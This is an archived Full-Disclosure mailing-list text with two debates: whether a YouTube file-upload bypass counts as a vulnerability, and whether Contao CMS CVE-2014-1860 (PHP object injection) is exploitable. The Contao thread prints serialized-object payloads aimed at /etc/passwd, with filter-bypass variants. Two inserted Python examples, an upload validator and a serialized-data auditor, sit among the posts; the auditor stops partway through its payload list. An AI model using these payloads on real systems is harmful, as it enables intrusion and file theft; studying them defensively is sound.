/JA https://github.com/athiasjerome/XORCISM 2014-03-14 7:19 GMT+03:00 Michal Zalewski lcam...@coredump.cx: Nicholas, I remember my early years in the infosec community - and sadly, so do some of the more seasoned readers of this list :-) Back then, I thought that the only thing that mattered is the ability to find bugs. But after some 18 years in the industry, I now know that there's an even more important and elusive skill. That skill boils down to having a robust mental model of what constitutes a security flaw - and being able to explain your thinking to others in a precise and internally consistent manner that convinces others to act. We need this because the security of a system can't be usefully described using abstract terms: even the academic definitions ultimately boil down to saying the system is secure if it doesn't do the things we *really* don't want it to do. In this spirit, the term vulnerability is generally reserved for behaviors that meet all of the following criteria: 1) The behavior must have negative consequences for at least one of the legitimate
Re: [Full-disclosure] Google vulnerabilities with PoC
Try learning how to properly send emails before criticizing anyone, pal. ;) On Fri, Mar 14, 2014 at 6:44 PM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: People can read the report if they like. Can't you even do basic things like reading a vulnerability report? Can't you see that the advisory is about writing arbitrary files. If I was your boss I would fire you. -- Forwarded message -- From: Nicholas Lemonias. lem.niko...@googlemail.com Date: Fri, Mar 14, 2014 at 5:43 PM Subject: Re: [Full-disclosure] Google vulnerabilities with PoC To: Mario Vilas mvi...@gmail.com People can read the report if they like. Can't you even do basic things like reading a vulnerability report? Can't you see that the advisory is about writing arbitrary files. If I was your boss I would fire you, with a good kick outta the door. On Fri, Mar 14, 2014 at 3:55 PM, Mario Vilas mvi...@gmail.com wrote: On Fri, Mar 14, 2014 at 12:38 PM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Jerome of Mcafee has made a very valid point on revisiting separation of duties in this security instance. Happy to see more professionals with some skills. Some others have also mentioned the feasibility for Denial of Service attacks. Remote code execution by Social Engineering is also a prominent scenario. Actually, people have been pointing out exactly the opposite. But if you insist on believing you can DoS an EC2 by uploading files, good luck to you then... If you can't tell that that is a vulnerability (probably coming from a bunch of CEH's), I feel sorry for those consultants. You're the only one throwing around certifications here. I can no longer tell if you're being serious or this is a massive prank. Nicholas. On Fri, Mar 14, 2014 at 10:45 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: We are on a different level perhaps. We do certainly disagree on those points. I wouldn't hire you as a consultant, if you can't tell if that is a valid vulnerability.. 
Best Regards, Nicholas Lemonias. On Fri, Mar 14, 2014 at 10:10 AM, Mario Vilas mvi...@gmail.com wrote: But do you have all the required EH certifications? Try this one from the Institute for Certified Application Security Specialists: http://www.asscert.com/ On Fri, Mar 14, 2014 at 7:41 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Thanks Michal, We are just trying to improve Google's security and contribute to the research community after all. If you are still on EFNet give me a shout some time. We have done so and consulted to hundreds of clients including Microsoft, Nokia, Adobe and some of the world's biggest corporations. We are also strict supporters of the ACM code of conduct. Regards, Nicholas Lemonias. AISec On Fri, Mar 14, 2014 at 6:29 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Hi Jerome, Thank you for agreeing on access control, and separation of duties. However successful exploitation permits arbitrary write() of any file of choice. I could release an exploit code in C Sharp or Python that permits multiple file uploads of any file/types, if the Google security team feels that this would be necessary. This is unpaid work, so we are not so keen on that job. On Fri, Mar 14, 2014 at 6:04 AM, Jerome Athias athiasjer...@gmail.com wrote: Hi I concur that we are mainly discussing a terminology problem. In the context of a Penetration Test or WAPT, this is a Finding. Reporting this finding makes sense in this context. As a professional, you would have to explain if/how this finding is a Weakness*, a Violation (/Regulations, Compliance, Policies or Requirements[1]) * I would say Weakness + Exposure = Vulnerability. Vulnerability + Exploitability (PoC) = Confirmed Vulnerability that needs Business Impact and Risk Analysis So I would probably have reported this Finding as a Weakness (and not Vulnerability. 
See: OWASP, WASC-TC, CWE), explaining that it is not Best Practice (your OWASP link and Cheat Sheets), and even if mitigative/compensative security controls (Ref Orange Book), security controls like white listing (or at least black listing. see also ESAPI) should be 1) part of the [1]security requirements of a proper SDLC (Build security in) as per Defense-in-Depth security principles and 2) used and implemented correctly. NB: A simple Threat Model (i.e. list of CAPEC) would be a solid support to your report. This would help to evaluate/measure the risk (e.g. CVSS), helping the decision/actions around this risk. PS: interestingly, in this case, I'm not sure that the Separation of Duties security principle was applied correctly by Google in terms of Risk Acceptance (which could be another Finding). So in a few words, be careful with the terminology. (don't always say vulnerability like the media say hacker, see RFC1392) Use a CWE ID (e.g. CWE-434, CWE-183, CWE-184 vs. CWE-616
Re: [Full-disclosure] Fwd: Fwd: Google vulnerabilities with PoC
Not to mention imaginary. On Fri, Mar 14, 2014 at 6:58 PM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Says the script kiddie... Beg for some publicity. My customers are FTSE 100. -- Forwarded message -- From: Nicholas Lemonias. lem.niko...@googlemail.com Date: Fri, Mar 14, 2014 at 5:58 PM Subject: Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC To: antisnatchor antisnatc...@gmail.com Says the script kiddie... Beg for some publicity. My customers are FTSE 100. On Fri, Mar 14, 2014 at 5:55 PM, antisnatchor antisnatc...@gmail.comwrote: LOL you're hopeless. Good luck with your business. Brave customers! Cheers antisnatchor Nicholas Lemonias. wrote: People can read the report if they like. Can't you even do basic things like reading a vulnerability report? Can't you see that the advisory is about writing arbitrary files. If I was your boss I would fire you. -- Forwarded message -- From: Nicholas Lemonias. lem.niko...@googlemail.com Date: Fri, Mar 14, 2014 at 5:43 PM Subject: Re: [Full-disclosure] Google vulnerabilities with PoC To: Mario Vilas mvi...@gmail.com People can read the report if they like. Can't you even do basic things like reading a vulnerability report? Can't you see that the advisory is about writing arbitrary files. If I was your boss I would fire you, with a good kick outta the door. On Fri, Mar 14, 2014 at 3:55 PM, Mario Vilas mvi...@gmail.com wrote: On Fri, Mar 14, 2014 at 12:38 PM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Jerome of Mcafee has made a very valid point on revisiting separation of duties in this security instance. Happy to see more professionals with some skills. Some others have also mentioned the feasibility for Denial of Service attacks. Remote code execution by Social Engineering is also a prominent scenario. Actually, people have been pointing out exactly the opposite. But if you insist on believing you can DoS an EC2 by uploading files, good luck to you then... 
If you can't tell that that is a vulnerability (probably coming from a bunch of CEH's), I feel sorry for those consultants. You're the only one throwing around certifications here. I can no longer tell if you're being serious or this is a massive prank. Nicholas. On Fri, Mar 14, 2014 at 10:45 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: We are on a different level perhaps. We do certainly disagree on those points. I wouldn't hire you as a consultant, if you can't tell if that is a valid vulnerability.. Best Regards, Nicholas Lemonias. On Fri, Mar 14, 2014 at 10:10 AM, Mario Vilas mvi...@gmail.comwrote: But do you have all the required EH certifications? Try this one from the Institute for Certified Application Security Specialists: http://www.asscert.com/ On Fri, Mar 14, 2014 at 7:41 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Thanks Michal, We are just trying to improve Google's security and contribute to the research community after all. If you are still on EFNet give me a shout some time. We have done so and consulted to hundreds of clients including Microsoft, Nokia, Adobe and some of the world's biggest corporations. We are also strict supporters of the ACM code of conduct. Regards, Nicholas Lemonias. AISec On Fri, Mar 14, 2014 at 6:29 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Hi Jerome, Thank you for agreeing on access control, and separation of duties. However successful exploitation permits arbitrary write() of any file of choice. I could release an exploit code in C Sharp or Python that permits multiple file uploads of any file/types, if the Google security team feels that this would be necessary. This is unpaid work, so we are not so keen on that job. On Fri, Mar 14, 2014 at 6:04 AM, Jerome Athias athiasjer...@gmail.com wrote: Hi I concur that we are mainly discussing a terminology problem. In the context of a Penetration Test or WAPT, this is a Finding. Reporting this finding makes sense in this context. 
As a professional, you would have to explain if/how this finding is a Weakness*, a Violation (/Regulations, Compliance, Policies or Requirements[1]) * I would say Weakness + Exposure = Vulnerability. Vulnerability + Exploitability (PoC) = Confirmed Vulnerability that needs Business Impact and Risk Analysis So I would probably have reported this Finding as a Weakness (and not Vulnerability. See: OWASP, WASC-TC, CWE), explaining that it is not Best Practice (your OWASP link and Cheat Sheets), and even if mitigative/compensative security controls (Ref Orange Book), security controls like white listing (or at least black listing. see also ESAPI) should be 1) part of the [1]security requirements of a proper SDLC (Build security in) as per Defense-in-Depth security principles and 2) used and implemented correctly. NB
Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC
[image: Inline image 1] On Fri, Mar 14, 2014 at 7:07 PM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Quite funnily, most erratic comments originate from a @gmail.com host. Does that mean that Google and Co are attacking the researcher ? On Fri, Mar 14, 2014 at 6:06 PM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Quite funnily, most erratic comments originate from a @gmail.com host. Does that mean that Google and Co are attacking the researcher ? On Fri, Mar 14, 2014 at 6:04 PM, Mike Hale eyeronic.des...@gmail.com wrote: No, you're saying something's a vulnerability without showing any indication of how it can be abused. On Fri, Mar 14, 2014 at 11:00 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: The full-disclosure mailing list has really changed. It's full of lamers nowadays aiming high. On Fri, Mar 14, 2014 at 5:58 PM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Says the script kiddie... Beg for some publicity. My customers are FTSE 100. -- Forwarded message -- From: Nicholas Lemonias. lem.niko...@googlemail.com Date: Fri, Mar 14, 2014 at 5:58 PM Subject: Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC To: antisnatchor antisnatc...@gmail.com Says the script kiddie... Beg for some publicity. My customers are FTSE 100. On Fri, Mar 14, 2014 at 5:55 PM, antisnatchor antisnatc...@gmail.com wrote: LOL you're hopeless. Good luck with your business. Brave customers! Cheers antisnatchor Nicholas Lemonias. wrote: People can read the report if they like. Can't you even do basic things like reading a vulnerability report? Can't you see that the advisory is about writing arbitrary files. If I was your boss I would fire you. -- Forwarded message -- From: Nicholas Lemonias. lem.niko...@googlemail.com Date: Fri, Mar 14, 2014 at 5:43 PM Subject: Re: [Full-disclosure] Google vulnerabilities with PoC To: Mario Vilas mvi...@gmail.com People can read the report if they like. 
Can't you even do basic things like reading a vulnerability report? Can't you see that the advisory is about writing arbitrary files. If I was your boss I would fire you, with a good kick outta the door. On Fri, Mar 14, 2014 at 3:55 PM, Mario Vilas mvi...@gmail.com wrote: On Fri, Mar 14, 2014 at 12:38 PM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Jerome of Mcafee has made a very valid point on revisiting separation of duties in this security instance. Happy to see more professionals with some skills. Some others have also mentioned the feasibility for Denial of Service attacks. Remote code execution by Social Engineering is also a prominent scenario. Actually, people have been pointing out exactly the opposite. But if you insist on believing you can DoS an EC2 by uploading files, good luck to you then... If you can't tell that that is a vulnerability (probably coming from a bunch of CEH's), I feel sorry for those consultants. You're the only one throwing around certifications here. I can no longer tell if you're being serious or this is a massive prank. Nicholas. On Fri, Mar 14, 2014 at 10:45 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: We are on a different level perhaps. We do certainly disagree on those points. I wouldn't hire you as a consultant, if you can't tell if that is a valid vulnerability.. Best Regards, Nicholas Lemonias. On Fri, Mar 14, 2014 at 10:10 AM, Mario Vilas mvi...@gmail.com wrote: But do you have all the required EH certifications? Try this one from the Institute for Certified Application Security Specialists: http://www.asscert.com/ On Fri, Mar 14, 2014 at 7:41 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Thanks Michal, We are just trying to improve Google's security and contribute to the research community after all. If you are still on EFNet give me a shout some time. We have done so and consulted to hundreds of clients including Microsoft, Nokia, Adobe and some of the world's biggest corporations. 
We are also strict supporters of the ACM code of conduct. Regards, Nicholas Lemonias. AISec On Fri, Mar 14, 2014 at 6:29 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Hi Jerome, Thank you for agreeing on access control, and separation of duties. However successful exploitation permits arbitrary write() of any file of choice. I could release an exploit code in C Sharp or Python that permits multiple file uploads of any file/types, if the Google security team feels that this would be necessary. This is unpaid work, so we are not so keen on that job. On Fri, Mar 14, 2014 at 6:04 AM, Jerome Athias athiasjer...@gmail.com wrote: Hi I concur that we are mainly
Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC
So if you can upload a file to Google Drive and trick someone to run it, you'd call that a vulnerability too? Hey, I've got another one. I can upload a video on Youtube telling people to download and install a virus. I'll claim a prize too! Keep at it man, you're hilarious! xDDD /me goes grab more popcorn On Fri, Mar 14, 2014 at 8:28 PM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Then that also means that firewalls and IPS systems are worthless. Why spend so much time protecting the network layers if a user can send any file of choice to a remote network through http... As for the uploaded files being persistent, there is evidence of that. For instance a remote admin could be tricked to execute some of the uploaded files (Social Engineering). So our report sent as part of Google's security program, should not be treated as a non-security issue. Thanks, On Fri, Mar 14, 2014 at 7:23 PM, R D rd.secli...@gmail.com wrote: I'm going to try to spell it out clearly. You don't have unrestricted file upload[1]. Keep in mind you're trying to abuse youtube, which is essentially a video file upload service. So the fact that you can upload files is not surprising. Now you're uploading non-video files. Cool. But not earth-shattering. They are not accessible to anyone but you, as far as I can tell, and I don't even think you can access the file contents on the remote server, but please prove me wrong on both points. You are still, as far as I can tell, bound by the per-file and per-account quota on disk occupation, so you don't have a DoS by resource exhaustion. You can't force server-side file path, so you don't have RFI or DoS by messing with the remote file system. You can't execute the files you uploaded, so you don't have arbitrary code execution. But you are right about what your PoC does. You bypassed a security control, you uploaded crap on youtube servers, and by that you exhausted their resources by a fraction of the quota they allow you when signing up. 
BTW, I don't think they keep invalid video files for an indefinite period of time in a user account, but I might be wrong. The burden of proof is still on your side as to whether or not the bug you found has any impact that was not already accepted by youtube allowing registered users to upload whatever crap they see fit as long as it is video. You failed to provide this proof, and please be sure the audience of fulldisclosure is not attacking the researcher but working with you to have a better understanding of the bug you found, even though you kinda acted like a fool in this thread. Please keep on searching and finding vulns, please keep on publishing them, and use this as a learning experience that not all bugs or control bypasses are security vulnerabilities. --Rob' [1] As per OWASP ( https://www.owasp.org/index.php/Unrestricted_File_Upload): There are really two classes of problems here. The first is with the file metadata, like the path and file name. These are generally provided by the transport, such as HTTP multi-part encoding. This data may trick the application into overwriting a critical file or storing the file in a bad location. You must validate the metadata extremely carefully before using it. Your POC doesn't demonstrate that. The other class of problem is with the file size or content. The range of problems here depends entirely on what the file is used for. See the examples below for some ideas about how files might be misused. To protect against this type of attack, you should analyze everything your application does with files and think carefully about what processing and interpreters are involved. Your POC kinda does that, but you didn't provide proof it's possible to execute what you uploaded, either using social engineering or any other method. Also, please don't say verified by a couple of recognised experts including OWASP unless you actually spoke with someone @owasp and she validated your findings. 
On Fri, Mar 14, 2014 at 7:40 PM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: We have many PoC's including video clips. We may upload for the security world to see. However, this is not the way to treat security vulnerabilities. Attacking the researcher and bringing your friends to do so as well won't mitigate the problem. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the
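The OWASP text R D quotes above splits unrestricted-file-upload problems into two classes: the transport-supplied metadata (path and filename) and the file's size and content. The following is an added example, not code from this thread, from YouTube or from OWASP, that shows a server-side check built along those two lines next to a weak check that trusts the declared Content-Type and the client filename (the CWE-434 shape Jerome Athias mentions). The size limits, quota, accepted container formats, sample bytes and function names are all constructed for the example.

```python
"""Added example: upload validation split into metadata and content checks.
Not code from the mailing-list thread, YouTube or OWASP; limits, names and
sample inputs are constructed for illustration."""
import os
import posixpath
import re
from typing import Optional, Tuple

MAX_FILE_BYTES = 8 * 1024 * 1024        # assumed per-file cap
ACCOUNT_QUOTA_BYTES = 64 * 1024 * 1024  # assumed per-account cap
# One safe path component: must start with an alphanumeric, so ".", ".."
# and dot-files are rejected without a separate check.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,99}$")

Result = Tuple[bool, str]  # (accepted, sniffed type or rejection reason)


def sniff_video(data: bytes) -> Optional[str]:
    """Identify a container by its magic bytes and ignore what the client
    claims. ISO BMFF (MP4) carries an 'ftyp' box at offset 4; WebM/Matroska
    begins with the EBML header 1A 45 DF A3."""
    if len(data) >= 12 and data[4:8] == b"ftyp":
        return "video/mp4"
    if data.startswith(b"\x1a\x45\xdf\xa3"):
        return "video/webm"
    return None


def validate_weak(filename: str, declared_type: str, data: bytes) -> Result:
    """Weak check (the thing to avoid): trusts the multipart Content-Type
    and hands back the client filename as the storage path. A shell script
    declared as video/mp4 is accepted, and '../' in the name escapes the
    upload directory."""
    if not declared_type.startswith("video/"):
        return (False, "declared type is not video")
    return (True, filename)


def validate_hardened(filename: str, data: bytes, used_quota: int) -> Result:
    """Metadata first, then size and quota, then content. On success the
    caller stores the bytes under storage_name(), never under `filename`."""
    # (1) metadata: the name must be a single safe path component
    base = posixpath.basename(filename.replace("\\", "/"))
    if base != filename or not SAFE_NAME.match(base):
        return (False, "bad filename metadata")
    # (2a) size and quota, decided before any parsing of the bytes
    if len(data) > MAX_FILE_BYTES:
        return (False, "file too large")
    if used_quota + len(data) > ACCOUNT_QUOTA_BYTES:
        return (False, "account quota exceeded")
    # (2b) content: accept only containers we can positively identify
    kind = sniff_video(data)
    if kind is None:
        return (False, "content is not an accepted video container")
    return (True, kind)


def storage_name() -> str:
    """Server-chosen opaque name (16 hex chars + '.bin'); the client name
    is kept only as display metadata."""
    return os.urandom(8).hex() + ".bin"


# Constructed inputs: a 24-byte MP4 header stub and a shell script.
SAMPLE_MP4 = b"\x00\x00\x00\x18ftypmp42\x00\x00\x00\x00mp42isom"
SAMPLE_SCRIPT = b"#!/bin/sh\nid\n"

if __name__ == "__main__":
    print(validate_weak("../../etc/cron.d/job", "video/mp4", SAMPLE_SCRIPT))
    print(validate_hardened("../../etc/cron.d/job", SAMPLE_SCRIPT, 0))
    print(validate_hardened("clip.mp4", SAMPLE_SCRIPT, 0))
    print(validate_hardened("clip.mp4", SAMPLE_MP4, 0))
```

The ordering matters: filename metadata is checked before the body is touched, and size and quota are enforced before any content parser runs, so an attacker cannot use an oversized or malformed upload to exhaust the parser. Sniffing only says the bytes look like a supported container; a real service would still hand the file to a media pipeline in a sandbox rather than serve it back as-is.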
Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC
Please provide an attack scenario. Can you do that? On Fri, Mar 14, 2014 at 9:23 PM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Are you sure this json response, or this file, will be there in a month? Or in a year? Is the fact that this json response exists a threat to youtube? Can you quantify how much of a threat? How much, in dollars, does it hurt their business? This file may be here if the admins don't delete it. Now they may do ;@) So where do you think that information is coming from? The metadata and tags, and headers are contained in a database. The files are stored persistently, since they can be quoted. So the API works both ways. The main thing here is that the files are there, otherwise their metadata information would be deleted from the db as well. http://gdata.youtube.com/demo/index.html?utm_source= twitterfeedutm_medium=twitter Youtube DATA API is unique.. the commands can be sent through that interface... So we do definitely know that that is coming from a database. On Fri, Mar 14, 2014 at 8:22 PM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: You are trying to execute an sh script through a video player. That's an exec() command. So it's the wrong way about accessing the file. On Fri, Mar 14, 2014 at 8:20 PM, R D rd.secli...@gmail.com wrote: No it's not. As Chris and I are saying, you don't have proof your file is accessible to others, only that it was uploaded. Now, you see, when you upload a video to youtube, you get the address where it will be viewable in the response. 
In your case:

{"sessionStatus":{"state":"FINALIZED","externalFieldTransfers":[{"name":"file","status":"COMPLETED","bytesTransferred":113,"bytesTotal":113,"formPostInfo":{"url":"http://www.youtube.com/upload/rupio?authuser=0\u0026upload_id=AEnB2UqVZlaog3GremriQEGDoUK3cdGGPu9MVIfyObgYajjo6i1--uQicn6jhbwsdNrqSF4ApbUbhCcwzdwe4xf_XTbL_t5-aw\u0026file_id=000","cross_domain_url":"http://upload.youtube.com/?authuser=0\u0026upload_id=AEnB2UqVZlaog3GremriQEGDoUK3cdGGPu9MVIfyObgYajjo6i1--uQicn6jhbwsdNrqSF4ApbUbhCcwzdwe4xf_XTbL_t5-aw\u0026origin=CiNodHRwOi8vd3d3LnlvdXR1YmUuY29tL3VwbG9hZC9ydXBpbxINdmlkZW8tdXBsb2Fkcw"},"content_type":"text/x-sh"}],"additionalInfo":{"uploader_service.GoogleRupioAdditionalInfo":{"completionInfo":{"status":"SUCCESS","customerSpecificInfo":{"status":"ok",*"video_id":"KzKDtijwHFI"*,"upload_id":"AEnB2UqVZlaog3GremriQEGDoUK3cdGGPu9MVIfyObgYajjo6i1--uQicn6jhbwsdNrqSF4ApbUbhCcwzdwe4xf_XTbL_t5-aw"}}

And what do we get when we browse to https://youtube.com/watch?v=KzKDtijwHFI ? Nothing. Can you send me a link where I can access the file content of the arbitrary file you uploaded? Are you sure this json response, or this file, will be there in a month? Or in a year? Is the fact that this json response exists a threat to youtube? Can you quantify how much of a threat? How much, in dollars, does it hurt their business? --Rob On Fri, Mar 14, 2014 at 9:08 PM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: My claim is now verified. Cheers! On Fri, Mar 14, 2014 at 8:04 PM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: http://upload.youtube.com/?authuser=0upload_id=AEnB2UqVZlaog3GremriQEGDoUK3cdGGPu9MVIfyObgYajjo6i1--uQicn6jhbwsdNrqSF4ApbUbhCcwzdwe4xf_XTbL_t5-aworigin=CiNodHRwOi8vd3d3LnlvdXR1YmUuY29tL3VwbG9hZC9ydXBpbxINdmlkZW8tdXBsb2Fkcw That information can be queried from the db, where the metadata are saved. The files are being saved persistently, as per the above example. On Fri, Mar 14, 2014 at 8:04 PM, Nicholas Lemonias. 
lem.niko...@googlemail.com wrote: http://upload.youtube.com/?authuser=0upload_id=AEnB2UqVZlaog3GremriQEGDoUK3cdGGPu9MVIfyObgYajjo6i1--uQicn6jhbwsdNrqSF4ApbUbhCcwzdwe4xf_XTbL_t5-aworigin=CiNodHRwOi8vd3d3LnlvdXR1YmUuY29tL3VwbG9hZC9ydXBpbxINdmlkZW8tdXBsb2Fkcw That information can be queried from the db, where the metadata are saved. The files are being saved persistently , as per the above example. On Fri, Mar 14, 2014 at 8:00 PM, Chris Thompson christhom7...@gmail.com wrote: Hi Nikolas, Please do read (and understand) my entire email before responding - I understand your frustration trying to get your message across but maybe this will help. Please put aside professional pride for the time being - I know how it feels to be passionate about something yet have others simply not understand. Let me try and bring some sanity to the discussion and explain to you why people maybe not agreeing with you. You (rightly so) highlighted what you believe to be an issue in a Youtube whereby it appears (to you) than you can upload an arbitrary file. If you can indeed do this as you suspect then your points are valid and you may be able to cause various issues associated with it such as DOS etc - especially if the uploaded files cannot or are not tracked. However... Consider than you are talking to an API and what you are getting back (the JSON response) in your example is simply a response from the API
Re: [Full-disclosure] [CVE-2014-1860] PHP object insertion / possible RCE in Contao CMS = 3.2.4
I haven't read the whole thread, so I apologize in advance for commenting on it. But I think it's important to mention that "not a vulnerability" and "not exploitable" are entirely different concepts. Since conclusively proving that a vulnerability is 100% not exploitable for all code paths in all possible environments is difficult at best (if not downright impossible), you can still consider something a vulnerability even if you don't have a proof of concept - you can assign it lower risk, of course, but it doesn't disappear, because there's at least a theoretical possibility that it may be exploited.

So, let's not get into a flame war yet. :)

On Fri, Feb 7, 2014 at 12:15 AM, Egidio Romano resea...@karmainsecurity.com wrote:

Hello again,

today a little bird known as i0n1c tweeted something about me [1], claiming that I was wrong, and that CVE-2014-1860 could actually be exploited, because there is "S:" which allows encoded NUL bytes [2], and that's true in part. So, instead of using a string like this:

O:9:ZipWriter:1:{s:10:\0*\0strTemp;s:11:/etc/passwd;}

An attacker might be able to bypass the filter implemented within the Input::xssClean() method because she can also use a string like this:

O:9:ZipWriter:1:{S:10:\00*\00strTemp;s:11:/etc/passwd;}

The Input::xssClean() method removes not only NULL bytes, but also the string "\0", meaning that the above string will be converted to:

O:9:ZipWriter:1:{S:10:0*0strTemp;s:11:/etc/passwd;}

Of course this could easily be bypassed using a string like this:

O:9:ZipWriter:1:{S:10:\\000*\\000strTemp;s:11:/etc/passwd;}

However, in such case there's another filter which doesn't allow to inject *protected* or *private* objects' properties, and that is implemented within the Input::encodeSpecialChars() method [3], which converts backslashes into #92;, meaning that the above string will be converted to:

O:9:ZipWriter:1:{S:10:#92;00*#92;00strTemp;s:11:/etc/passwd;}

Therefore, unless somebody (like Pedro Ribeiro or Mr. Stefan Esser) provides a working Proof of Concept, I will continue to believe that CVE-2014-1860 should be rejected as non-vulnerability.

References:
[1] https://twitter.com/i0n1c/status/431367715941400576
[2] https://twitter.com/i0n1c/status/431368722624704512
[3] http://git.io/DFkxDQ

Kind Regards,
Egidio Romano

On Wed, Feb 05, 2014 at 11:13:29PM +0100, Egidio Romano wrote:

Hello,

I believe this CVE should be rejected, because the vulnerabilities actually don't exist, at least the ones mentioned in this report. The reason is that user input is passed to the unserialize() function through the Contao Input class, in which the Input::xssClean() method removes all the NULL bytes from user input, meaning that an attacker can be able to manipulate only the *public* properties of the injected objects, because *protected* and *private* properties of a serialized object are encoded with NULL bytes. I haven't found any exploitable magic method in Contao which uses only *public* properties, and the ones mentioned in the original report are exploitable only through *protected* properties. Therefore, unless someone provides a working Proof of Concept, I think these shouldn't be considered actual security vulnerabilities.

Best Regards,
Egidio Romano

Hi,

I have discovered a vulnerability that might lead to code execution in Contao CMS = 3.2.4

Contao CMS = 3.2.4 does not properly validate user input in several locations which is then passed directly into PHP's unserialize.

This has been fixed in Contao 3.2.5 as per commit:
https://github.com/contao/core/commit/8c9cb044bdc887a8202bb65a64545c025664f957
and
https://github.com/contao/core/commit/1717336598fdcf1ed3f4ad488e140147cb31516d

Announcements can be found at
https://contao.org/en/news/contao-3_2_5.html
https://contao.org/en/news/contao-2_11_14.html

Thanks to the Contao developers for being so responsive.

The full report can be found at my repo in https://github.com/pedrib/PoC/blob/master/contao-3.2.4.txt

Regards,
Pedro Ribeiro
Agile Information Security

___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

-- "There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people."
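The filter argument in the thread above can be checked mechanically. What follows is an added example, not Contao's code and not from any post in the thread: a minimal decoder for PHP's serialize() format that handles both s: and S: (hex-escaped) strings, flags property names that carry the NUL-byte visibility markers, and replays the two filters as Egidio describes them. The contao_filter_chain function is an assumed approximation of that description, not Contao's real Input::xssClean() and Input::encodeSpecialChars(); the three payloads are the thread's strings with the quotes serialize() actually emits restored.

```python
from dataclasses import dataclass, field


@dataclass
class PHPObject:
    class_name: bytes
    props: dict = field(default_factory=dict)


def _read_string(data, pos, length, escaped, terminator):
    """Read a quoted string body from its opening quote; `length` counts
    decoded bytes, and in S: strings a \\xx hex escape decodes to one byte."""
    if data[pos:pos + 1] != b'"':
        raise ValueError("expected opening quote")
    pos += 1
    out = bytearray()
    while len(out) < length:
        if escaped and data[pos:pos + 1] == b"\\":
            out.append(int(data[pos + 1:pos + 3], 16))
            pos += 3
        else:
            out.append(data[pos])  # IndexError on truncation -> malformed
            pos += 1
    if data[pos:pos + len(terminator)] != terminator:
        raise ValueError("bad string terminator")
    return bytes(out), pos + len(terminator)


def parse(data, pos=0):
    """Parse one value at `pos` (tags N i b d s S a O); return (value, next pos)."""
    tag = data[pos:pos + 1]
    if tag == b"N":
        return None, pos + 2
    if tag in (b"i", b"b", b"d"):
        end = data.index(b";", pos)
        conv = {b"i": int, b"b": lambda r: bool(int(r)), b"d": float}[tag]
        return conv(data[pos + 2:end].decode()), end + 1
    if tag in (b"s", b"S"):
        colon = data.index(b":", pos + 2)
        return _read_string(data, colon + 1, int(data[pos + 2:colon]), tag == b"S", b'";')
    if tag in (b"a", b"O"):
        colon = data.index(b":", pos + 2)
        if tag == b"O":  # O:<len>:"Class":<count>:{...}
            name, pos = _read_string(data, colon + 1, int(data[pos + 2:colon]), False, b'":')
            colon = data.index(b":", pos)
            container, count = PHPObject(name), int(data[pos:colon])
            members = container.props
        else:            # a:<count>:{...}
            container = members = {}
            count = int(data[pos + 2:colon])
        pos = colon + 2  # skip ':{'
        for _ in range(count):
            key, pos = parse(data, pos)
            value, pos = parse(data, pos)
            members[key] = value
        if data[pos:pos + 1] != b"}":
            raise ValueError("unterminated container")
        return container, pos + 1
    raise ValueError(f"unsupported tag {tag!r} at offset {pos}")


def non_public_properties(value, found=None):
    """List (class, name, visibility) for names with PHP's NUL prefix:
    \\0*\\0name is protected, \\0Class\\0name is private."""
    found = [] if found is None else found
    if isinstance(value, PHPObject):
        for name, member in value.props.items():
            if isinstance(name, bytes) and b"\x00" in name:
                kind = "protected" if name.startswith(b"\x00*\x00") else "private"
                found.append((value.class_name, name, kind))
            non_public_properties(member, found)
    elif isinstance(value, dict):
        for member in value.values():
            non_public_properties(member, found)
    return found


def contao_filter_chain(data):
    """Assumed approximation of the filters as described in the post (not
    Contao's code): xssClean drops NUL bytes and the literal two-character
    sequence backslash-zero; encodeSpecialChars turns backslash into &#92;."""
    cleaned = data.replace(b"\x00", b"").replace(b"\\0", b"")
    return cleaned.replace(b"\\", b"&#92;")


def audit(serialized):
    """'malformed' (unserialize() would reject it), 'non-public-property'
    (a protected/private name reaches the object) or 'public-only'."""
    try:
        value, end = parse(serialized)
    except (ValueError, IndexError, TypeError):
        return "malformed"
    if end != len(serialized):
        return "malformed"
    return "non-public-property" if non_public_properties(value) else "public-only"


# Constructed payloads: the thread's three strings with serialize()'s quotes restored.
RAW_NUL = b'O:9:"ZipWriter":1:{s:10:"\x00*\x00strTemp";s:11:"/etc/passwd";}'
HEX_ESCAPED = b'O:9:"ZipWriter":1:{S:10:"\\00*\\00strTemp";s:11:"/etc/passwd";}'
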